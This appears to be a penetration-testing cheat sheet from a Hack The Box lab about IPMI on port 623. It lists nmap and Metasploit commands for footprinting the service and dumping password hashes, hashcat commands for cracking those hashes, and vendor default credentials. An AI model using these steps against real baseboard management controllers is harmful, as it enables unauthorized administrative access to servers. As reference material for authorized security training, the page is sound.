[623] IPMI

IPMI (Port: 623)

#  Footprint the service.
Intrusionz3r0X@htb[/htb]$ sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local

# Get the IPMI Version
Intrusionz3r0X@htb[/htb]$ msf6 > use auxiliary/scanner/ipmi/ipmi_version

# Metasploit Dumping Hashes
Intrusionz3r0X@htb[/htb]$ msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes

Bruteforce the hash password

Hash Mode

Hash name

hash example

7300

IPMI2 RAKP HMAC-SHA1

b7c2d6f13a43dce2e44ad120a9cd8a13d0ca23f0414275c0bbe1070d2d1299b1c04da0f1a0f1e4e2537300263a2200000000000000000000140768617368636174:472bdabe2d5d4bffd6add7b3ba79a291d104a9ef

Intrusionz3r0X@htb[/htb]$ hashcat -m 7300 hash /usr/share/wordlists/rockyou.txt 
Intrusionz3r0X@htb[/htb]$ hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

Default passwords

Product

Username

Password

Dell iDRAC

root

calvin

HP iLO

Administrator

randomized 8-character string consisting of numbers and uppercase letters

Supermicro IPMI

ADMIN

Previous[512,513,514] R-Services Next[873] Rsync